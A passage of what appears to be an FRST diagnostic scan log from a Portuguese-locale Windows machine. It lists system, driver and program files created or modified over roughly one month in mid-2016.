2016-06-15 17:02 - 2016-02-12 20:14 - 00136904 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2016-06-15 17:02 - 2016-02-12 16:14 - 03708416 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-06-15 17:02 - 2016-02-12 15:55 - 00409088 _____ (Microsoft Corporation) C:\Windows\system32\WUSettingsProvider.dll
2016-06-15 17:02 - 2016-02-12 15:54 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2016-06-15 17:02 - 2016-02-12 15:54 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2016-06-15 17:02 - 2016-02-12 15:54 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2016-06-15 17:02 - 2016-02-12 15:51 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2016-06-15 17:02 - 2016-02-12 15:51 - 00081920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2016-06-15 17:02 - 2016-02-12 15:51 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2016-06-15 17:02 - 2016-02-12 15:48 - 02244096 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2016-06-15 17:02 - 2016-02-12 15:47 - 00897024 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2016-06-15 17:02 - 2016-02-12 15:46 - 00726528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2016-06-15 17:02 - 2015-11-20 19:18 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2016-06-15 17:02 - 2015-07-30 18:18 - 00268288 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2016-06-15 17:02 - 2015-07-30 17:22 - 00230912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkEd.dll
2016-06-15 17:02 - 2015-07-09 19:40 - 00359936 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2016-06-15 17:02 - 2015-06-27 04:08 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2016-06-15 17:02 - 2015-06-27 03:14 - 00027136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2016-06-15 17:02 - 2015-03-14 02:51 - 00015360 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2016-06-15 17:02 - 2015-03-13 03:58 - 00259072 _____ (Microsoft Corporation) C:\Windows\system32\pku2u.dll
2016-06-15 17:02 - 2015-03-13 03:37 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pku2u.dll
2016-06-15 17:02 - 2015-02-21 00:49 - 00780800 _____ (Microsoft Corporation) C:\Windows\system32\lsm.dll
2016-06-15 17:01 - 2016-05-18 06:31 - 00372568 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-06-15 17:01 - 2016-05-18 06:31 - 00315224 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-06-15 17:01 - 2016-05-14 00:04 - 00044032 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-06-15 17:01 - 2016-05-13 23:19 - 00035840 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-06-15 17:01 - 2015-07-22 15:33 - 01728000 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Immersive.dll
2016-06-15 17:01 - 2015-07-22 15:25 - 01546752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Immersive.dll
2016-06-15 17:01 - 2015-07-07 10:40 - 00270168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdFilter.sys
2016-06-15 17:01 - 2015-07-07 10:40 - 00114520 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdNisDrv.sys
2016-06-15 17:01 - 2015-07-07 10:40 - 00044560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdBoot.sys
2016-06-15 17:01 - 2015-07-01 23:19 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll
2016-06-15 17:01 - 2015-07-01 23:16 - 00104448 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll
2016-06-15 17:01 - 2015-07-01 22:37 - 00198656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebClnt.dll
2016-06-15 17:01 - 2015-07-01 22:35 - 00087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\davclnt.dll
2016-06-15 17:01 - 2015-04-08 23:55 - 00410128 _____ (Microsoft Corporation) C:\Windows\system32\services.exe
2016-06-15 17:00 - 2016-04-10 08:48 - 00738096 _____ (Microsoft Corporation) C:\Windows\system32\d3d10level9.dll
2016-06-15 17:00 - 2016-04-10 08:48 - 00613624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10level9.dll
2016-06-15 17:00 - 2016-02-06 19:08 - 00031744 _____ (Microsoft Corporation) C:\Windows\system32\seclogon.dll
2016-06-15 17:00 - 2016-02-05 20:07 - 00292696 _____ (Microsoft Corporation) C:\Windows\system32\WMASF.DLL
2016-06-15 17:00 - 2016-02-05 20:07 - 00243032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMASF.DLL
2016-06-15 17:00 - 2016-02-05 16:03 - 15432704 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-06-15 17:00 - 2016-02-05 16:00 - 13318144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2016-06-15 17:00 - 2016-01-19 20:13 - 02175008 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2016-06-15 17:00 - 2016-01-19 20:13 - 01063464 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2016-06-15 17:00 - 2016-01-19 19:23 - 01564496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2016-06-15 17:00 - 2016-01-19 19:23 - 00548024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2016-06-15 17:00 - 2016-01-19 17:37 - 00267776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincorlib.dll
2016-06-15 17:00 - 2016-01-06 19:25 - 00140800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-06-15 17:00 - 2015-09-12 14:47 - 00414559 _____ C:\Windows\system32\ApnDatabase.xml
2016-06-15 17:00 - 2015-03-09 03:02 - 00067584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storvsp.sys
2016-06-15 16:59 - 2016-05-21 18:28 - 25802752 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-06-15 16:59 - 2016-05-21 17:57 - 20341248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-06-15 16:59 - 2016-05-20 23:09 - 00572416 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-06-15 16:59 - 2016-05-20 23:08 - 02895360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-06-15 16:59 - 2016-05-20 23:02 - 06051328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-06-15 16:59 - 2016-05-20 22:57 - 00497664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-06-15 16:59 - 2016-05-20 22:55 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-06-15 16:59 - 2016-05-20 22:54 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-06-15 16:59 - 2016-05-20 22:50 - 02287104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-06-15 16:59 - 2016-05-20 22:44 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-06-15 16:59 - 2016-05-20 22:29 - 13815808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-06-15 16:59 - 2016-05-20 22:27 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-06-15 16:59 - 2016-05-20 22:25 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-06-15 16:59 - 2016-05-20 22:25 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2016-06-15 16:59 - 2016-05-20 22:21 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-06-15 16:59 - 2016-05-20 22:21 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2016-06-15 16:59 - 2016-05-20 22:19 - 01032704 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-06-15 16:59 - 2016-05-20 22:16 - 00880128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-06-15 16:59 - 2016-05-20 22:14 - 04610048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-06-15 16:59 - 2016-05-20 22:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-06-15 16:59 - 2016-05-20 22:11 - 15420928 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-06-15 16:59 - 2016-05-20 22:11 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-06-15 16:59 - 2016-05-20 22:09 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-06-15 16:59 - 2016-05-20 22:09 - 00379392 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-06-15 16:59 - 2016-05-20 22:08 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-06-15 16:59 - 2016-05-20 22:08 - 00806400 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-06-15 16:59 - 2016-05-20 22:06 - 02131968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-06-15 16:59 - 2016-05-20 21:46 - 02597888 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-06-15 16:59 - 2016-05-20 21:42 - 02121216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-06-15 16:59 - 2016-05-20 21:38 - 01310208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-06-15 16:59 - 2016-05-20 21:38 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-06-15 16:59 - 2016-05-20 21:34 - 01544192 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-06-15 16:59 - 2016-05-20 21:23 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-06-15 16:59 - 2016-04-22 20:14 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-06-15 16:59 - 2016-04-22 19:52 - 00330752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-06-15 16:59 - 2016-02-08 21:29 - 00099328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-06-15 16:59 - 2016-02-08 19:14 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-06-15 16:59 - 2016-02-08 18:15 - 02880000 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2016-06-15 16:59 - 2016-01-31 20:16 - 00148832 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\USBSTOR.SYS
2016-06-15 16:59 - 2015-11-10 01:04 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-06-15 16:59 - 2015-11-10 00:25 - 01048576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll
2016-06-15 16:59 - 2015-11-08 23:02 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-06-15 16:59 - 2015-09-10 18:18 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-06-15 16:59 - 2015-09-10 17:51 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-06-15 16:59 - 2015-09-10 17:17 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-06-15 16:59 - 2015-09-10 17:07 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-06-15 16:59 - 2015-07-16 21:36 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-06-15 16:59 - 2015-07-16 20:50 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-06-15 16:59 - 2015-06-15 23:02 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2016-06-15 16:59 - 2015-06-15 22:58 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-06-15 16:59 - 2015-06-15 21:47 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2016-06-15 16:59 - 2015-06-15 21:44 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-06-15 16:59 - 2015-05-23 04:04 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-06-15 16:59 - 2015-05-22 19:47 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-06-15 16:59 - 2015-04-25 03:34 - 00653824 _____ (Microsoft Corporation) C:\Windows\system32\comctl32.dll
2016-06-15 16:59 - 2015-04-25 03:33 - 00549888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comctl32.dll
2016-06-15 16:59 - 2015-04-21 17:13 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-06-15 16:58 - 2015-07-09 18:13 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\notepad.exe
2016-06-15 16:58 - 2015-07-09 18:13 - 00221184 _____ (Microsoft Corporation) C:\Windows\notepad.exe
2016-06-15 16:58 - 2015-07-09 17:30 - 00212992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
2016-06-15 16:57 - 2016-07-02 15:52 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-06-15 16:57 - 2016-06-15 17:03 - 00000000 ____D C:\Users\User not found\AppData\Local\Mozilla
2016-06-15 16:57 - 2016-06-15 16:57 - 00001171 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-06-15 16:57 - 2016-06-15 16:57 - 00001159 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-06-15 16:57 - 2016-06-15 16:57 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Mozilla
2016-06-15 16:57 - 2015-02-24 09:32 - 00991552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2016-06-15 16:56 - 2016-04-11 07:21 - 00074584 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\volmgr.sys
2016-06-15 16:56 - 2016-04-10 06:37 - 01549144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2016-06-15 16:56 - 2015-12-28 22:42 - 00713216 _____ (Microsoft Corporation) C:\Windows\system32\WinSync.dll
2016-06-15 16:56 - 2015-12-28 21:31 - 00578048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinSync.dll
2016-06-15 16:56 - 2015-08-03 22:15 - 00074928 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-06-15 16:56 - 2015-08-03 22:15 - 00065600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-06-15 16:56 - 2015-08-01 15:22 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-06-15 16:56 - 2015-08-01 04:47 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\schtasks.exe
2016-06-15 16:56 - 2015-08-01 04:45 - 00182784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schtasks.exe
2016-06-15 16:56 - 2015-08-01 04:38 - 01265152 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll
2016-06-15 16:56 - 2015-08-01 04:37 - 00468992 _____ (Microsoft Corporation) C:\Windows\system32\taskeng.exe
2016-06-15 16:56 - 2015-08-01 04:37 - 00359936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskeng.exe
2016-06-15 16:56 - 2015-07-10 19:19 - 01101824 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2016-06-15 16:56 - 2015-07-10 18:14 - 00856064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2016-06-15 16:56 - 2015-07-10 18:13 - 07032320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2016-06-15 16:56 - 2015-07-10 17:31 - 06213120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2016-06-15 16:55 - 2016-05-19 00:15 - 01379040 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-06-15 16:55 - 2016-05-18 21:35 - 01097216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-06-15 16:55 - 2016-02-04 18:24 - 00603648 _____ (Microsoft Corporation) C:\Windows\system32\mfds.dll
2016-06-15 16:55 - 2016-02-04 18:02 - 00483328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfds.dll
2016-06-15 16:55 - 2015-07-14 04:27 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\tzsync.exe
2016-06-15 16:55 - 2015-03-04 11:25 - 00377152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\clfs.sys
2016-06-15 16:55 - 2015-03-04 04:04 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\clfsw32.dll
2016-06-15 16:55 - 2015-03-04 03:19 - 00058880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\clfsw32.dll
2016-06-15 16:54 - 2016-06-20 16:29 - 00000000 __SHD C:\Users\User not found\AppData\Local\EmieUserList
2016-06-15 16:54 - 2016-06-20 16:29 - 00000000 __SHD C:\Users\User not found\AppData\Local\EmieSiteList
2016-06-15 16:54 - 2016-06-20 16:28 - 00000000 __SHD C:\Users\User not found\AppData\LocalLow\EmieUserList
2016-06-15 16:54 - 2016-06-15 16:54 - 00000000 __SHD C:\Users\User not found\AppData\LocalLow\EmieBrowserModeList
2016-06-15 16:54 - 2016-06-15 16:54 - 00000000 __SHD C:\Users\User not found\AppData\Local\EmieBrowserModeList
2016-06-15 16:54 - 2016-05-14 21:01 - 00363104 _____ (Microsoft Corporation) C:\Windows\system32\ws2_32.dll
2016-06-15 16:54 - 2016-05-14 21:01 - 00320720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ws2_32.dll
2016-06-15 16:54 - 2016-05-14 00:07 - 00281088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2016-06-15 16:54 - 2016-05-13 22:58 - 00339456 _____ (Microsoft Corporation) C:\Windows\system32\mswsock.dll
2016-06-15 16:54 - 2016-05-13 22:45 - 00802816 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2016-06-15 16:54 - 2016-05-13 22:35 - 00286208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswsock.dll
2016-06-15 16:54 - 2016-05-13 22:26 - 00631808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
2016-06-15 16:54 - 2016-03-03 17:13 - 00059392 _____ (Microsoft Corporation) C:\Windows\system32\basesrv.dll
2016-06-15 16:54 - 2015-11-21 19:32 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-06-15 16:54 - 2015-11-21 18:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-06-15 16:54 - 2015-07-13 20:46 - 00059392 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-06-15 16:54 - 2015-03-20 05:10 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-06-15 16:54 - 2015-03-20 05:10 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-06-15 16:54 - 2015-03-14 01:09 - 00200192 _____ (Microsoft Corporation) C:\Windows\system32\storewuauth.dll
2016-06-15 16:53 - 2016-06-20 16:28 - 00000000 __SHD C:\Users\User not found\AppData\LocalLow\EmieSiteList
2016-06-15 16:53 - 2015-12-08 20:08 - 00685432 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-06-15 16:53 - 2015-12-08 20:07 - 00507176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-06-15 16:48 - 2016-07-11 18:14 - 00000000 ____D C:\ProgramData\NVIDIA
2016-06-15 16:46 - 2016-07-11 18:15 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-06-15 16:46 - 2016-07-11 18:15 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-06-15 16:19 - 2016-06-15 16:19 - 00000000 ____D C:\Program Files\Intel
2016-06-15 16:19 - 2016-06-15 16:19 - 00000000 ____D C:\Program Files (x86)\Intel
2016-06-15 16:19 - 2016-06-15 16:19 - 00000000 ____D C:\Intel
2016-06-15 16:19 - 2015-08-27 18:20 - 00072704 _____ (Khronos Group) C:\Windows\system32\OpenCL.DLL
2016-06-15 16:19 - 2015-08-27 18:20 - 00069120 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.DLL
2016-06-15 15:44 - 2016-07-14 01:00 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2876588207-1483049806-666444280-1002
2016-06-15 15:39 - 2016-07-02 19:31 - 00000000 ____D C:\Users\User not found
2016-06-15 15:39 - 2016-06-16 16:48 - 00000000 ____D C:\Users\User not found\AppData\Local\Packages
2016-06-15 15:39 - 2016-06-15 18:42 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Adobe
2016-06-15 15:39 - 2016-06-15 15:39 - 00001434 _____ C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-06-15 15:39 - 2016-06-15 15:39 - 00000216 _____ C:\rb_config.js
2016-06-15 15:39 - 2016-06-15 15:39 - 00000070 _____ C:\history.js
2016-06-15 15:39 - 2016-06-15 15:39 - 00000020 ___SH C:\Users\User not found\ntuser.ini
2016-06-15 15:39 - 2016-06-15 15:39 - 00000000 _SHDL C:\Users\User not found\Os Meus Documentos
2016-06-15 15:39 - 2016-06-15 15:39 - 00000000 _SHDL C:\Users\User not found\Modelos
2016-06-15 15:39 - 2016-06-15 15:39 - 00000000 _SHDL C:\Users\User not found\Menu Iniciar
2016-06-15 15:39 - 2016-06-15 15:39 - 00000000 _SHDL C:\Users\User not found\Documents\Os Meus Vídeos
2016-06-15 15:39 - 2016-06-15 15:39 - 00000000 _SHDL C:\Users\User not found\Documents\As Minhas Imagens
2016-06-15 15:39 - 2016-06-15 15:39 - 00000000 _SHDL C:\Users\User not found\Documents\A Minha Música
2016-06-15 15:39 - 2016-06-15 15:39 - 00000000 _SHDL C:\Users\User not found\Definições Locais
2016-06-15 15:39 - 2016-06-15 15:39 - 00000000 _SHDL C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programas
2016-06-15 15:39 - 2016-06-15 15:39 - 00000000 _SHDL C:\Users\User not found\AppData\Local\Histórico
2016-06-15 15:39 - 2016-06-15 15:39 - 00000000 ____D C:\Users\User not found\AppData\Local\VirtualStore
2016-06-15 15:39 - 2014-11-21 08:48 - 00000369 _____ C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2016-06-15 15:39 - 2014-11-21 08:48 - 00000369 _____ C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2016-06-15 15:36 - 2016-06-15 21:40 - 00484008 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2016-06-15 15:34 - 2016-06-15 15:34 - 00000000 ____D C:\Windows\CSC
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Public\Documents\Os Meus Vídeos
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Public\Documents\As Minhas Imagens
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Public\Documents\A Minha Música
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default\Os Meus Documentos
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default\Modelos
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default\Menu Iniciar
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default\Documents\Os Meus Vídeos
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default\Documents\As Minhas Imagens
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default\Documents\A Minha Música
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default\Definições Locais
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programas
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default\AppData\Local\Histórico
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default User\Documents\Os Meus Vídeos
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default User\Documents\As Minhas Imagens
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default User\Documents\A Minha Música
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programas
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Histórico
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\ProgramData\Modelos
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\ProgramData\Microsoft\Windows\Start Menu\Programas
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\ProgramData\Menu Iniciar
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\ProgramData\Documentos
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\ProgramData\Ambiente de Trabalho
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Programas
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Program Files\Ficheiros Comuns
2016-06-15 15:30 - 2016-06-15 15:30 - 00000000 _SHDL C:\Program Files\Common Files\Sistema
2016-06-15 15:28 - 2016-06-15 15:28 - 00000000 ____D C:\Windows\$SAMSUNG$
2016-06-15 15:26 - 2016-06-15 15:26 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-15 14:47 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\NDF
2016-07-13 22:59 - 2015-03-15 07:21 - 00826448 _____ C:\Windows\system32\prfh0816.dat
2016-07-13 22:59 - 2015-03-15 07:21 - 00180490 _____ C:\Windows\system32\prfc0816.dat
2016-07-13 22:59 - 2014-11-21 08:38 - 01921692 _____ C:\Windows\system32\PerfStringBackup.INI
2016-07-13 22:59 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\Inf
2016-07-13 22:39 - 2013-08-22 15:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-07-13 20:08 - 2013-08-22 16:36 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2016-07-12 19:20 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2016-07-12 19:20 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\Macromed
2016-07-11 18:20 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\rescache
2016-07-11 18:14 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\Help
2016-07-11 18:08 - 2013-08-22 14:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-07-08 14:45 - 2015-03-15 07:13 - 00000000 ____D C:\Windows\SysWOW64\XPSViewer
2016-07-08 14:45 - 2014-11-21 08:18 - 00000000 ____D C:\Program Files\Windows Journal
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\SysWOW64\winrm
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\SysWOW64\WCN
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\SysWOW64\slmgr
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\SysWOW64\Printing_Admin_Scripts
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\system32\winrm
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\system32\slmgr
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\WinStore
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\SysWOW64\MUI
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\SysWOW64\Com
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\migwiz
